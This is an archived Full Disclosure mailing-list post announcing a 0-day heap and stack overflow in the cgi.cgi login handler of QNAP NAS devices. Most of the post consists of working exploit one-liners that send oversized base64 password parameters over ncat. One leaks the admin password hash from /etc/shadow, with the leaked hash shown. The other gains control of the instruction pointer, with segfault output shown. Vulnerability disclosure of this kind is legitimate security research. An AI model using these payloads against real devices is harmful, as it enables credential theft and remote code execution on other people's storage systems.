| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Message-ID: <1DA42A57-5AEF-421E-82E3-597FC269C95D@noemail.eu>
Date: Mon, 2 Jan 2017 15:26:58 +0000
From: bashis <mcw@...mail.eu>
To: "fulldisclosure@...lists.org" <fulldisclosure@...lists.org>, Bugtraq
<bugtraq@...urityfocus.com>
Subject: Re: [FD] 0-day: QNAP NAS Devices suffer of heap overflow
Read admin password from /etc/shadow (loaded in heap at address 0x0806ce56)
[Remote Host]# echo -en "GET /cgi-bin/cgi.cgi?u=admin&p=`for((i=0;i<4467;i++));do echo -en "B";done | base64 -w 0 ; echo -en "D\x56\xce\x06\x08" | base64 -w 0` HTTP/1.0\nHost: BUG\n\n" | ncat --ssl 192.168.5.7 443 | grep glibc
*** glibc detected *** $1$$8lBa9PhdBbp9/AeeTXXXXX: free(): invalid next size (normal): 0x0806e510 ***
[Remote Host]#
Device: QNAP TS-251+
FW Version: QTS 4.2.2 (Build 20161214)
/bashis
And also;
==================
[Stack overflow]
==================
[Remote Host]# echo -en "GET /cgi-bin/cgi.cgi?u=admin&p=`for((i=0;i<1489;i++));do echo -en "QUFB";done``echo -en "QUJCQkI="` HTTP/1.0\nHost: BUG\n\n” | ncat --ssl 192.168.5.7 443
HTTP/1.1 200 OK
Date: Mon, 02 Jan 2017 11:59:24 GMT
Content-Length: 0
Connection: close
Content-Type: text/plain
[Remote Host]#
====
[Local Host]# dmesg | grep 42424242
[161034.536318] cgi.cgi[28705]: segfault at 42424242 ip 00000000f6c1159b sp 00000000fffe84fc error 4 in libc-2.6.1.so[f6ba5000+12d000]
[Local Host]#
[QUJCQkI=] -> Base64encode -> [BBBB]
Have a nice day
/bashis
_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
Powered by blists - more mailing lists